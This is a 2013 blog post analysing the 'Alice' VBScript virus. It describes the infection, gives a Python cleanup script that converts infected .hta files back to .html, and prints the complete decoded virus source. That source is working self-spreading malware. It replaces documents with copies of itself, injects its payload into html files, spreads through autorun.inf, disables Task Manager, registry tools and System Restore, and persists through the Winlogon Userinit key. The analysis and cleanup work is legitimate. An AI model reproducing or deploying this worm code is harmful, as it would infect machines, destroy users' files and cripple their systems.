Tuesday, 2 July 2013

An Alice Virus analysis by script-kid.


Do not EXECUTE this code on your normal window's laptop.

I got an Alice Virus from e-mail.

It is a virus which has:
    It makes all of doc, docx, rtf files to be .vbe of 8 kb and hiding doc files.
    It .htm and .html file to be .hta with a VBscript of Alice Virus.
    It is encoded a Microsoft Script Encoder, however, we can decode it using scrdec18.
It deletes .lnk files
It changes and removes window register's values.
It infects autorun.inf
it makes Alice.sys and Alice.alc: located in c:\Windows\System32\Drivers\ (32bit).

The MS Essential can detect the virus, on the other hand, it cannot recover html files.

First of all, I tried to make a program for recovering html file:
    I coded a string counting function of "alice.tmp" on ".HTA" files until it does not have "alice.tmp".
    I did not have files include "alice.tmp" strings when I try to fix infected files.
    I removed (5 * (alice.tmp counting / 2)) lines from end of the hta files.
    I changed file extension from .hta to .html.
Second, I installed MS Essential and fixed the Alice Virus.
Last, I set doc, docx and rtf files to get normal permissions like unhide, unread-only.
    I set restoring registers.

It is the logic for hta2html source code.
 import os  
 import re  
   
 def os_walkf(root, filterDir=None, filterName=None, filterExt=None):  
   for base, dirs, names in os.walk(root):  
     if filterDir:  
       dirs[:] = [dir for dir in dirs if filterDir(dir)]  
     if filterName:  
       if filterExt:  
         for name in names:  
           if filterName(name) and filterExt(os.path.splitext(name)[1]):  
             yield os.path.join(base, name)  
       else:  
         for name in names:  
           if filterName(name):  
             yield os.path.join(base, name)  
     else:  
       if filterExt:  
         for name in names:  
           if filterExt(os.path.splitext(name)[1]):  
             yield os.path.join(base, name)  
       else:  
         for name in names:  
           yield os.path.join(base, name)  
   
 def set_countstring(path):  
   fs = open(path, "r")  
   data = fs.read()  
   strcnt = data.count("alice.tmp")  
   strcnt = strcnt / 2  
   fs.close()  
   return strcnt  
     
   
 def set_filelen(fs):  
   count = 0  
   while 1:  
     line = fs.readline()  
     count = count + 1  
     if not line: break  
   return count  
   
 def set_hta2html(path):  
   strcnt = set_countstring(path)  
     
   fs = open(path,"r")  
   fs_len = set_filelen(fs)  
   fs.close()  
     
   fs = open(path,"r")  
   new_filename = path[:-3]+'html'  
   new_fs = open(new_filename, "w")  
   
   count = 0  
   while count < (fs_len - (6*strcnt)):  
     data = fs.readline()  
     new_fs.write(data)  
     count = count + 1  
     
   fs.close()  
   new_fs.close()  
     
   
 def main():  
   drv = re.findall(r"[A-Z]+:.*$",os.popen("mountvol /").read(),re.MULTILINE)  
   
   for i in drv :  
     for path in os_walkf(i, filterDir=lambda dir: (dir),filterExt=lambda ext: (ext.lower() == ".hta")):  
       print(path)  
       set_hta2html(path)  
       os.remove(path)  
   
 main()  
   
   

It is the Alice Virus code after I used scrdec18.

#Alice virus
 option explicit  
 dim f300e,thpfp,mxlcm,ye9ue,aixlb  
 set f300e=createobject("Scripting.FileSystemObject")  
 set thpfp=createobject("WScript.Shell")  
 set mxlcm=f300e.getfile(wscript.scriptfullname)  
 set ye9ue=f300e.getspecialfolder(0)  
 set aixlb=f300e.getspecialfolder(1)  
 sub ayfp6(ck1cp)  
 on error resume next  
 dim s41k8  
 v41tf(ck1cp)  
 set s41k8=f300e.getfile(ck1cp)  
 s41k8.attributes=39  
 end sub  
 sub f0l51()  
 on error resume next  
 dim bgw3u  
 for each bgw3u in f300e.drives  
 if (bgw3u.drivetype=1 or bgw3u.drivetype=2 or bgw3u.drivetype=3) and bgw3u.path<>"A:" then  
 ayfp6(bgw3u.path&"\alice.alc")  
 qag1n(bgw3u.path&"\autorun.inf")  
 syasj(bgw3u.path&"\")  
 rid6b(bgw3u.path&"\")  
 end if  
 next  
 end sub  
 sub hy26l()  
 on error resume next  
 dim e9ljz,purpl  
 for each e9ljz in f300e.getfolder(thpfp.specialfolders("Recent")).files  
 purpl=lcase(f300e.getextensionname(e9ljz.path))  
 if purpl="lnk" then  
 zpzoe(e9ljz.path)  
 end if  
 next  
 end sub  
 sub kugxq(p9krq,wzc5e)  
 on error resume next  
 dim qs247,zf3cw,a4zpt,u960a,kbkzd  
 set qs247=f300e.opentextfile(p9krq,1)  
 zf3cw=qs247.readall  
 qs247.close  
 set qs247=f300e.opentextfile(mxlcm,1)  
 a4zpt=qs247.readall  
 qs247.close  
 u960a=replace(a4zpt,chr(34),chr(216))  
 kbkzd=vbcrlf&"<HTML>"&vbcrlf&"<SCRIPT language="&chr(34)&"VBScript"&chr(34)&">"&vbcrlf&"on error resume next:set i129a=createobject("&chr(34)&"Scripting.FileSystemObject"&chr(34)&"):set uvqkz=createobject("&chr(34)&"WScript.Shell"&chr(34)&"):set ony43=i129a.getspecialfolder(1):set rowb1=i129a.getspecialfolder(2):p3vli="&chr(34)&u960a&chr(34)&":l3h0l=replace(p3vli,chr(216),chr(34)):esbvk=l3h0l&chr(0):set ivofa=i129a.createtextfile(rowb1&"&chr(34)&"\alice.tmp"&chr(34)&",true):ivofa.write(esbvk):ivofa.close:uvqkz.run(ony43&"&chr(34)&"\wscript.exe //e:vbscript.encode "&chr(34)&"&rowb1&"&chr(34)&"\alice.tmp"&chr(34)&")"&vbcrlf&"</SCRIPT>"&vbcrlf&"</HTML>"  
 set qs247=f300e.createtextfile(wzc5e,true)  
 qs247.write(zf3cw)  
 qs247.write(kbkzd)  
 qs247.close  
 end sub  
 function ljwom(db04w)  
 ljwom=thpfp.regread("HKCR\."&db04w&"\")  
 end function  
 sub llgz8()  
 on error resume next  
 do while mxlcm=(aixlb&"\drivers\alice.sys")  
 f0l51()  
 loop  
 end sub  
 sub m9g2p()  
 on error resume next  
 if not f300e.fileexists(aixlb&"\drivers\alice.sys") then  
 ayfp6(aixlb&"\drivers\alice.sys")  
 thpfp.run(aixlb&"\wscript.exe //e:vbscript.encode "&aixlb&"\drivers\alice.sys")  
 else  
 vs7xo()  
 wcpw7()  
 hy26l()  
 llgz8()  
 end if  
 end sub  
 sub qag1n(fg77p)  
 on error resume next  
 dim btfzw,tmkuj  
 btfzw="[autorun]"&vbcrlf&"shellexecute=wscript.exe //e:vbscript.encode alice.alc"&vbcrlf&"shell\open\command=wscript.exe //e:vbscript.encode alice.alc"&vbcrlf&"shell\explore\command=wscript.exe //e:vbscript.encode alice.alc"  
 set tmkuj=f300e.createtextfile(fg77p,true)  
 tmkuj.write(btfzw)  
 tmkuj.close  
 if err.number<>0 then  
 zpzoe(fg77p)  
 set tmkuj=f300e.createtextfile(fg77p,true)  
 tmkuj.write(btfzw)  
 tmkuj.close  
 end if  
 set tmkuj=f300e.getfile(fg77p)  
 tmkuj.attributes=39  
 end sub  
 sub rid6b(wib5969)  
 on error resume next  
 dim zdet3  
 for each zdet3 in f300e.getfolder(wib5969).subfolders  
 if zdet3.name<>"RECYCLER" and zdet3.name<>"System Volume Information" then  
 syasj(zdet3.path)  
 rid6b(zdet3.path)  
 end if  
 next  
 end sub  
 sub syasj(qo1qy)  
 on error resume next  
 dim vlx8c,tk8hq,eiklf,fbr9k  
 for each vlx8c in f300e.getfolder(qo1qy).files  
 tk8hq=lcase(f300e.getextensionname(vlx8c.path))  
 eiklf=f300e.getbasename(vlx8c.path)  
 if (tk8hq="doc" or tk8hq="docx" or tk8hq="rtf") and left(eiklf,2)<>"~$" then  
 v41tf(qo1qy&"\"&eiklf&".vbe")  
 vd8vs(vlx8c.path)  
 elseif tk8hq="htm" or tk8hq="html" then  
 kugxq(vlx8c.path),(qo1qy&"\"&eiklf&".hta")  
 zpzoe(vlx8c.path)  
 end if  
 next  
 end sub  
 sub v41tf(watpl)  
 on error resume next  
 dim ugn6h,jk5vz  
 set ugn6h=f300e.opentextfile(mxlcm,1)  
 jk5vz=ugn6h.readall  
 ugn6h.close  
 set ugn6h=f300e.createtextfile(watpl,true)  
 ugn6h.write(jk5vz)  
 ugn6h.close  
 if err.number<>0 then  
 zpzoe(watpl)  
 set ugn6h=f300e.createtextfile(watpl,true)  
 ugn6h.write(jk5vz)  
 ugn6h.close  
 end if  
 end sub  
 sub vd8vs(p3zu2)  
 on error resume next  
 dim p3fbg  
 set p3fbg=f300e.getfile(p3zu2)  
 p3fbg.attributes=38  
 end sub  
 sub vs7xo()  
 on error resume next  
 thpfp.regdelete"HKCR\*\shellex\ContextMenuHandlers\Open With\"  
 thpfp.regdelete"HKCR\inffile\shell\Install\command\"  
 thpfp.regdelete"HKCR\inffile\shell\Install\"  
 thpfp.regdelete"HKCR\regfile\shell\open\command\"  
 thpfp.regdelete"HKCR\regfile\shell\open\"  
 thpfp.regdelete"HKCR\VBEFile\Shell\Open2\command\"  
 thpfp.regdelete"HKCR\VBEFile\Shell\Open2\"  
 thpfp.regdelete"HKCR\VBEFile\Shell\Edit\command\"  
 thpfp.regdelete"HKCR\VBEFile\Shell\Edit\"  
 thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","0","REG_DWORD"  
 thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1","REG_DWORD"  
 thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate","1","REG_DWORD"  
 thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"  
 thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","1","REG_DWORD"  
 thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1","REG_DWORD"  
 thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"  
 thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","1","REG_DWORD"  
 thpfp.regwrite"HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","2","REG_DWORD"  
 thpfp.regwrite"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","ALICE"  
 thpfp.regwrite"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization",""  
 thpfp.regwrite"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",aixlb&"\userinit.exe,"&aixlb&"\wscript.exe //e:vbscript.encode "&aixlb&"\drivers\alice.sys"  
 thpfp.regwrite"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR","1","REG_DWORD"  
 thpfp.regwrite"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig","1","REG_DWORD"  
 end sub  
 sub wcpw7()  
 on error resume next  
 dim r0a7u,rwyg5  
 r0a7u="HKCR\"&ljwom("doc")  
 rwyg5="HKCR\"&ljwom("VBE")  
 thpfp.regwrite rwyg5&"\",thpfp.regread(r0a7u&"\")  
 thpfp.regwrite rwyg5&"\DefaultIcon\",thpfp.regread(r0a7u&"\DefaultIcon\")  
 thpfp.regwrite rwyg5&"\FriendlyTypeName",thpfp.regread(r0a7u&"\"),"REG_EXPAND_SZ"  
 thpfp.regwrite rwyg5&"\NeverShowExt",""  
 end sub  
 sub xvhxt()  
 on error resume next  
 dim ktl17  
 ktl17=left(mxlcm,len(mxlcm)-3)  
 if mxlcm.name="alice.alc" then   
 thpfp.run ye9ue&"\explorer.exe /e,/select,"&wscript.scriptfullname  
 elseif f300e.fileexists(ktl17&"doc") then  
 thpfp.run(thpfp.regread("HKCR\"&ljwom("doc")&"\shell\Open\command\")&chr(32)&chr(34)&ktl17&"doc"&chr(34))  
 elseif f300e.fileexists(ktl17&"docx") then  
 thpfp.run(thpfp.regread("HKCR\"&ljwom("docx")&"\shell\Open\command\")&chr(32)&chr(34)&ktl17&"docx"&chr(34))  
 elseif f300e.fileexists(ktl17&"rtf") then  
 thpfp.run(thpfp.regread("HKCR\"&ljwom("rtf")&"\shell\Open\command\")&chr(32)&chr(34)&ktl17&"rtf"&chr(34))  
 end if  
 end sub  
 sub zpzoe(yunj7)  
 on error resume next  
 dim fbr9k  
 f300e.deletefile(yunj7)  
 if err.number<>0 then  
 set fbr9k=f300e.getfile(yunj7)  
 fbr9k.attributes=0  
 f300e.deletefile(yunj7)  
 end if  
 end sub  
 xvhxt()  
 m9g2p()  

No comments:

Post a Comment